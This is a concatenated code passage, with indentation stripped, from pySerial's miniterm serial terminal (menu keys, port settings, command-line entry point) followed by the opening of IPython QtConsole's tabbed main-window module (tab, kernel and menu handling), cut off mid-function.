data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=115200, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
mainwindow.py
|
"""The Qt MainWindow for the QtConsole
This is a tabbed pseudo-terminal of IPython sessions, with a menu bar for
common actions.
Authors:
* Evan Patterson
* Min RK
* Erik Tollerud
* Fernando Perez
* Bussonnier Matthias
* Thomas Kluyver
* Paul Ivanov
"""
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# stdlib imports
import sys
import re
import webbrowser
import ast
from threading import Thread
# System library imports
from IPython.external.qt import QtGui,QtCore
def background(f):
"""call a function in a simple thread, to prevent blocking"""
t = Thread(target=f)
t.start()
return t
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class MainWindow(QtGui.QMainWindow):
#---------------------------------------------------------------------------
# 'object' interface
#---------------------------------------------------------------------------
_magic_menu_dict = {}
def __init__(self, app,
confirm_exit=True,
new_frontend_factory=None, slave_frontend_factory=None,
):
""" Create a tabbed MainWindow for managing IPython FrontendWidgets
Parameters
----------
app : reference to QApplication parent
confirm_exit : bool, optional
Whether we should prompt on close of tabs
new_frontend_factory : callable
A callable that returns a new IPythonWidget instance, attached to
its own running kernel.
slave_frontend_factory : callable
A callable that takes an existing IPythonWidget, and returns a new
IPythonWidget instance, attached to the same kernel.
"""
super(MainWindow, self).__init__()
self._kernel_counter = 0
self._app = app
self.confirm_exit = confirm_exit
self.new_frontend_factory = new_frontend_factory
self.slave_frontend_factory = slave_frontend_factory
self.tab_widget = QtGui.QTabWidget(self)
self.tab_widget.setDocumentMode(True)
self.tab_widget.setTabsClosable(True)
self.tab_widget.tabCloseRequested[int].connect(self.close_tab)
self.setCentralWidget(self.tab_widget)
# hide tab bar at first, since we have no tabs:
self.tab_widget.tabBar().setVisible(False)
# prevent focus in tab bar
self.tab_widget.setFocusPolicy(QtCore.Qt.NoFocus)
def update_tab_bar_visibility(self):
""" update visibility of the tabBar depending of the number of tab
0 or 1 tab, tabBar hidden
2+ tabs, tabBar visible
send a self.close if number of tab ==0
need to be called explicitly, or be connected to tabInserted/tabRemoved
"""
if self.tab_widget.count() <= 1:
self.tab_widget.tabBar().setVisible(False)
else:
self.tab_widget.tabBar().setVisible(True)
if self.tab_widget.count()==0 :
self.close()
@property
def next_kernel_id(self):
"""constantly increasing counter for kernel IDs"""
c = self._kernel_counter
self._kernel_counter += 1
return c
@property
def active_frontend(self):
return self.tab_widget.currentWidget()
def create_tab_with_new_frontend(self):
"""create a new frontend and attach it to a new tab"""
widget = self.new_frontend_factory()
self.add_tab_with_frontend(widget)
def create_tab_with_current_kernel(self):
"""create a new frontend attached to the same kernel as the current tab"""
current_widget = self.tab_widget.currentWidget()
current_widget_index = self.tab_widget.indexOf(current_widget)
current_widget_name = self.tab_widget.tabText(current_widget_index)
widget = self.slave_frontend_factory(current_widget)
if 'slave' in current_widget_name:
# don't keep stacking slaves
name = current_widget_name
else:
name = '(%s) slave' % current_widget_name
self.add_tab_with_frontend(widget,name=name)
def close_tab(self,current_tab):
""" Called when you need to try to close a tab.
It takes the number of the tab to be closed as argument, or a reference
to the widget inside this tab
"""
# let's be sure "tab" and "closing widget" are respectively the index
# of the tab to close and a reference to the frontend to close
if type(current_tab) is not int :
current_tab = self.tab_widget.indexOf(current_tab)
closing_widget=self.tab_widget.widget(current_tab)
# when trying to be closed, widget might re-send a request to be
# closed again, but will be deleted when event will be processed. So
# need to check that widget still exists and skip if not. One example
# of this is when 'exit' is sent in a slave tab. 'exit' will be
# re-sent by this function on the master widget, which ask all slave
# widgets to exit
if closing_widget==None:
return
#get a list of all slave widgets on the same kernel.
slave_tabs = self.find_slave_widgets(closing_widget)
keepkernel = None #Use the prompt by default
if hasattr(closing_widget,'_keep_kernel_on_exit'): #set by exit magic
keepkernel = closing_widget._keep_kernel_on_exit
# If signal sent by exit magic (_keep_kernel_on_exit, exist and not None)
# we set local slave tabs._hidden to True to avoid prompting for kernel
# restart when they get the signal. and then "forward" the 'exit'
# to the main window
if keepkernel is not None:
for tab in slave_tabs:
tab._hidden = True
if closing_widget in slave_tabs:
try :
self.find_master_tab(closing_widget).execute('exit')
except AttributeError:
self.log.info("Master already closed or not local, closing only current tab")
self.tab_widget.removeTab(current_tab)
self.update_tab_bar_visibility()
return
kernel_manager = closing_widget.kernel_manager
if keepkernel is None and not closing_widget._confirm_exit:
# don't prompt, just terminate the kernel if we own it
# or leave it alone if we don't
keepkernel = closing_widget._existing
if keepkernel is None: #show prompt
if kernel_manager and kernel_manager.channels_running:
title = self.window().windowTitle()
cancel = QtGui.QMessageBox.Cancel
okay = QtGui.QMessageBox.Ok
if closing_widget._may_close:
msg = "You are closing the tab : "+'"'+self.tab_widget.tabText(current_tab)+'"'
info = "Would you like to quit the Kernel and close all attached Consoles as well?"
justthis = QtGui.QPushButton("&No, just this Tab", self)
justthis.setShortcut('N')
closeall = QtGui.QPushButton("&Yes, close all", self)
closeall.setShortcut('Y')
# allow ctrl-d ctrl-d exit, like in terminal
closeall.setShortcut('Ctrl+D')
box = QtGui.QMessageBox(QtGui.QMessageBox.Question,
title, msg)
box.setInformativeText(info)
box.addButton(cancel)
box.addButton(justthis, QtGui.QMessageBox.NoRole)
box.addButton(closeall, QtGui.QMessageBox.YesRole)
box.setDefaultButton(closeall)
box.setEscapeButton(cancel)
pixmap = QtGui.QPixmap(self._app.icon.pixmap(QtCore.QSize(64,64)))
box.setIconPixmap(pixmap)
reply = box.exec_()
if reply == 1: # close All
for slave in slave_tabs:
background(slave.kernel_manager.stop_channels)
self.tab_widget.removeTab(self.tab_widget.indexOf(slave))
closing_widget.execute("exit")
self.tab_widget.removeTab(current_tab)
background(kernel_manager.stop_channels)
elif reply == 0: # close Console
if not closing_widget._existing:
# Have kernel: don't quit, just close the tab
closing_widget.execute("exit True")
self.tab_widget.removeTab(current_tab)
background(kernel_manager.stop_channels)
else:
reply = QtGui.QMessageBox.question(self, title,
"Are you sure you want to close this Console?"+
"\nThe Kernel and other Consoles will remain active.",
okay|cancel,
defaultButton=okay
)
if reply == okay:
self.tab_widget.removeTab(current_tab)
elif keepkernel: #close console but leave kernel running (no prompt)
self.tab_widget.removeTab(current_tab)
background(kernel_manager.stop_channels)
else: #close console and kernel (no prompt)
self.tab_widget.removeTab(current_tab)
if kernel_manager and kernel_manager.channels_running:
for slave in slave_tabs:
background(slave.kernel_manager.stop_channels)
self.tab_widget.removeTab(self.tab_widget.indexOf(slave))
kernel_manager.shutdown_kernel()
background(kernel_manager.stop_channels)
self.update_tab_bar_visibility()
def add_tab_with_frontend(self,frontend,name=None):
""" insert a tab with a given frontend in the tab bar, and give it a name
"""
if not name:
name = 'kernel %i' % self.next_kernel_id
self.tab_widget.addTab(frontend,name)
self.update_tab_bar_visibility()
self.make_frontend_visible(frontend)
frontend.exit_requested.connect(self.close_tab)
def next_tab(self):
self.tab_widget.setCurrentIndex((self.tab_widget.currentIndex()+1))
def prev_tab(self):
self.tab_widget.setCurrentIndex((self.tab_widget.currentIndex()-1))
def make_frontend_visible(self,frontend):
widget_index=self.tab_widget.indexOf(frontend)
if widget_index > 0 :
self.tab_widget.setCurrentIndex(widget_index)
def find_master_tab(self,tab,as_list=False):
"""
Try to return the frontend that owns the kernel attached to the given widget/tab.
Only finds frontend owned by the current application. Selection
based on port of the kernel might be inaccurate if several kernel
on different ip use same port number.
This function does the conversion tabNumber/widget if needed.
Might return None if no master widget (non local kernel)
Will crash IPython if more than 1 masterWidget
When asList set to True, always return a list of widget(s) owning
the kernel. The list might be empty or containing several Widget.
"""
#convert from/to int/richIpythonWidget if needed
if isinstance(tab, int):
tab = self.tab_widget.widget(tab)
km=tab.kernel_manager
#build list of all widgets
widget_list = [self.tab_widget.widget(i) for i in range(self.tab_widget.count())]
# widget that are candidate to be the owner of the kernel does have all the same port of the curent widget
# And should have a _may_close attribute
filtered_widget_list = [ widget for widget in widget_list if
widget.kernel_manager.connection_file == km.connection_file and
hasattr(widget,'_may_close') ]
# the master widget is the one that may close the kernel
master_widget= [ widget for widget in filtered_widget_list if widget._may_close]
if as_list:
return master_widget
assert(len(master_widget)<=1 )
if len(master_widget)==0:
return None
return master_widget[0]
def find_slave_widgets(self,tab):
"""return all the frontends that do not own the kernel attached to the given widget/tab.
Only find frontends owned by the current application. Selection
based on connection file of the kernel.
This function does the conversion tabNumber/widget if needed.
"""
#convert from/to int/richIpythonWidget if needed
if isinstance(tab, int):
tab = self.tab_widget.widget(tab)
km=tab.kernel_manager
#build list of all widgets
widget_list = [self.tab_widget.widget(i) for i in range(self.tab_widget.count())]
# widget that are candidate not to be the owner of the kernel does have all the same port of the curent widget
filtered_widget_list = ( widget for widget in widget_list if
widget.kernel_manager.connection_file == km.connection_file)
# Get a list of all widget owning the same kernel and removed it from
# the previous cadidate. (better using sets ?)
master_widget_list = self.find_master_tab(tab, as_list=True)
slave_list = [widget for widget in filtered_widget_list if widget not in master_widget_list]
return slave_list
# Populate the menu bar with common actions and shortcuts
def add_menu_action(self, menu, action, defer_shortcut=False):
"""Add action to menu as well as self
So that when the menu bar is invisible, its actions are still available.
If defer_shortcut is True, set the shortcut context to widget-only,
where it will avoid conflict with shortcuts already bound to the
widgets themselves.
"""
menu.addAction(action)
self.addAction(action)
if defer_shortcut:
action.setShortcutContext(QtCore.Qt.WidgetShortcut)
def init_menu_bar(self):
#create menu in the order they should appear in the menu bar
self.init_file_menu()
self.init_edit_menu()
self.init_view_menu()
self.init_kernel_menu()
self.init_magic_menu()
self.init_window_menu()
self.init_help_menu()
def init_file_menu(self):
self.file_menu = self.menuBar().addMenu("&File")
self.new_kernel_tab_act = QtGui.QAction("New Tab with &New kernel",
self,
shortcut="Ctrl+T",
triggered=self.create_tab_with_new_frontend)
self.add_menu_action(self.file_menu, self.new_kernel_tab_act)
self.slave_kernel_tab_act = QtGui.QAction("New Tab with Sa&me kernel",
self,
shortcut="Ctrl+Shift+T",
triggered=self.create_tab_with_current_kernel)
self.add_menu_action(self.file_menu, self.slave_kernel_tab_act)
self.file_menu.addSeparator()
self.close_action=QtGui.QAction("&Close Tab",
self,
shortcut=QtGui.QKeySequence.Close,
triggered=self.close_active_frontend
)
self.add_menu_action(self.file_menu, self.close_action)
self.export_action=QtGui.QAction("&Save to HTML/XHTML",
self,
shortcut=QtGui.QKeySequence.Save,
triggered=self.export_action_active_frontend
)
self.add_menu_action(self.file_menu, self.export_action, True)
self.file_menu.addSeparator()
printkey = QtGui.QKeySequence(QtGui.QKeySequence.Print)
if printkey.matches("Ctrl+P") and sys.platform != 'darwin':
# Only override the default if there is a collision.
# Qt ctrl = cmd on OSX, so the match gets a false positive on OSX.
printkey = "Ctrl+Shift+P"
self.print_action = QtGui.QAction("&Print",
self,
shortcut=printkey,
triggered=self.print_action_active_frontend)
self.add_menu_action(self.file_menu, self.print_action, True)
if sys.platform != 'darwin':
# OSX always has Quit in the Application menu, only add it
# to the File menu elsewhere.
self.file_menu.addSeparator()
self.quit_action = QtGui.QAction("&Quit",
self,
shortcut=QtGui.QKeySequence.Quit,
triggered=self.close,
)
self.add_menu_action(self.file_menu, self.quit_action)
def init_edit_menu(self):
self.edit_menu = self.menuBar().addMenu("&Edit")
self.undo_action = QtGui.QAction("&Undo",
self,
shortcut=QtGui.QKeySequence.Undo,
statusTip="Undo last action if possible",
triggered=self.undo_active_frontend
)
self.add_menu_action(self.edit_menu, self.undo_action)
self.redo_action = QtGui.QAction("&Redo",
self,
shortcut=QtGui.QKeySequence.Redo,
statusTip="Redo last action if possible",
triggered=self.redo_active_frontend)
self.add_menu_action(self.edit_menu, self.redo_action)
self.edit_menu.addSeparator()
self.cut_action = QtGui.QAction("&Cut",
self,
shortcut=QtGui.QKeySequence.Cut,
triggered=self.cut_active_frontend
)
self.add_menu_action(self.edit_menu, self.cut_action, True)
self.copy_action = QtGui.QAction("&Copy",
self,
shortcut=QtGui.QKeySequence.Copy,
triggered=self.copy_active_frontend
)
self.add_menu_action(self.edit_menu, self.copy_action, True)
self.copy_raw_action = QtGui.QAction("Copy (&Raw Text)",
self,
shortcut="Ctrl+Shift+C",
triggered=self.copy_raw_active_frontend
)
self.add_menu_action(self.edit_menu, self.copy_raw_action, True)
self.paste_action = QtGui.QAction("&Paste",
self,
shortcut=QtGui.QKeySequence.Paste,
triggered=self.paste_active_frontend
)
self.add_menu_action(self.edit_menu, self.paste_action, True)
self.edit_menu.addSeparator()
selectall = QtGui.QKeySequence(QtGui.QKeySequence.SelectAll)
if selectall.matches("Ctrl+A") and sys.platform != 'darwin':
# Only override the default if there is a collision.
# Qt ctrl = cmd on OSX, so the match gets a false positive on OSX.
selectall = "Ctrl+Shift+A"
self.select_all_action = QtGui.QAction("Select &All",
self,
shortcut=selectall,
triggered=self.select_all_active_frontend
)
self.add_menu_action(self.edit_menu, self.select_all_action, True)
def init_view_menu(self):
self.view_menu = self.menuBar().addMenu("&View")
if sys.platform != 'darwin':
# disable on OSX, where there is always a menu bar
self.toggle_menu_bar_act = QtGui.QAction("Toggle &Menu Bar",
self,
shortcut="Ctrl+Shift+M",
statusTip="Toggle visibility of menubar",
triggered=self.toggle_menu_bar)
self.add_menu_action(self.view_menu, self.toggle_menu_bar_act)
fs_key = "Ctrl+Meta+F" if sys.platform == 'darwin' else "F11"
self.full_screen_act = QtGui.QAction("&Full Screen",
self,
shortcut=fs_key,
statusTip="Toggle between Fullscreen and Normal Size",
triggered=self.toggleFullScreen)
self.add_menu_action(self.view_menu, self.full_screen_act)
self.view_menu.addSeparator()
self.increase_font_size = QtGui.QAction("Zoom &In",
self,
shortcut=QtGui.QKeySequence.ZoomIn,
triggered=self.increase_font_size_active_frontend
)
self.add_menu_action(self.view_menu, self.increase_font_size, True)
self.decrease_font_size = QtGui.QAction("Zoom &Out",
self,
shortcut=QtGui.QKeySequence.ZoomOut,
triggered=self.decrease_font_size_active_frontend
)
self.add_menu_action(self.view_menu, self.decrease_font_size, True)
self.reset_font_size = QtGui.QAction("Zoom &Reset",
self,
shortcut="Ctrl+0",
triggered=self.reset_font_size_active_frontend
)
self.add_menu_action(self.view_menu, self.reset_font_size, True)
self.view_menu.addSeparator()
self.clear_action = QtGui.QAction("&Clear Screen",
self,
shortcut='Ctrl+L',
statusTip="Clear the console",
triggered=self.clear_magic_active_frontend)
self.add_menu_action(self.view_menu, self.clear_action)
def init_kernel_menu(self):
self.kernel_menu = self.menuBar().addMenu("&Kernel")
# Qt on OSX maps Ctrl to Cmd, and Meta to Ctrl
# keep the signal shortcuts to ctrl, rather than
# platform-default like we do elsewhere.
ctrl = "Meta" if sys.platform == 'darwin' else "Ctrl"
self.interrupt_kernel_action = QtGui.QAction("&Interrupt current Kernel",
self,
triggered=self.interrupt_kernel_active_frontend,
shortcut=ctrl+"+C",
)
self.add_menu_action(self.kernel_menu, self.interrupt_kernel_action)
self.restart_kernel_action = QtGui.QAction("&Restart current Kernel",
self,
triggered=self.restart_kernel_active_frontend,
shortcut=ctrl+"+.",
)
self.add_menu_action(self.kernel_menu, self.restart_kernel_action)
self.kernel_menu.addSeparator()
self.confirm_restart_kernel_action = QtGui.QAction("&Confirm kernel restart",
self,
checkable=True,
checked=self.active_frontend.confirm_restart,
triggered=self.toggle_confirm_restart_active_frontend
)
self.add_menu_action(self.kernel_menu, self.confirm_restart_kernel_action)
self.tab_widget.currentChanged.connect(self.update_restart_checkbox)
def _make_dynamic_magic(self,magic):
"""Return a function `fun` that will execute `magic` on active frontend.
Parameters
----------
magic : string
string that will be executed as is when the returned function is called
Returns
-------
fun : function
function with no parameters, when called will execute `magic` on the
current active frontend at call time
See Also
--------
populate_all_magic_menu : generate the "All Magics..." menu
Notes
-----
`fun` executes `magic` in active frontend at the moment it is triggered,
not the active frontend at the moment it was created.
This function is mostly used to create the "All Magics..." Menu at run time.
"""
# need two level nested function to be sure to pass magic
# to active frontend **at run time**.
def inner_dynamic_magic():
self.active_frontend.execute(magic)
inner_dynamic_magic.__name__ = "dynamics_magic_s"
return inner_dynamic_magic
def populate_all_magic_menu(self, listofmagic=None):
"""Clean "All Magics..." menu and repopulate it with `listofmagic`
Parameters
----------
listofmagic : string,
repr() of a list of strings, send back by the kernel
Notes
-----
`listofmagic`is a repr() of list because it is fed with the result of
a 'user_expression'
"""
for k,v in self._magic_menu_dict.items():
v.clear()
self.all_magic_menu.clear()
protected_magic = set(["more","less","load_ext","pycat","loadpy","load","save","psource"])
mlist=ast.literal_eval(listofmagic)
for magic in mlist:
cell = (magic['type'] == 'cell')
name = magic['name']
mclass = magic['class']
if cell :
prefix='%%'
else :
prefix='%'
magic_menu = self._get_magic_menu(mclass)
if name in protected_magic:
suffix = '?'
else :
suffix = ''
pmagic = '%s%s%s'%(prefix,name,suffix)
xaction = QtGui.QAction(pmagic,
self,
triggered=self._make_dynamic_magic(pmagic)
)
magic_menu.addAction(xaction)
self.all_magic_menu.addAction(xaction)
def update_all_magic_menu(self):
""" Update the list of magics in the "All Magics..." Menu
Request the kernel with the list of available magics and populate the
menu with the list received back
"""
self.active_frontend._silent_exec_callback('get_ipython().magics_manager.lsmagic_info()',
self.populate_all_magic_menu)
def _get_magic_menu(self,menuidentifier, menulabel=None):
"""return a submagic menu by name, and create it if needed
parameters:
-----------
menulabel : str
Label for the menu
Will infere the menu name from the identifier at creation if menulabel not given.
To do so you have too give menuidentifier as a CamelCassedString
"""
menu = self._magic_menu_dict.get(menuidentifier,None)
if not menu :
if not menulabel:
menulabel = re.sub("([a-zA-Z]+)([A-Z][a-z])","\g<1> \g<2>",menuidentifier)
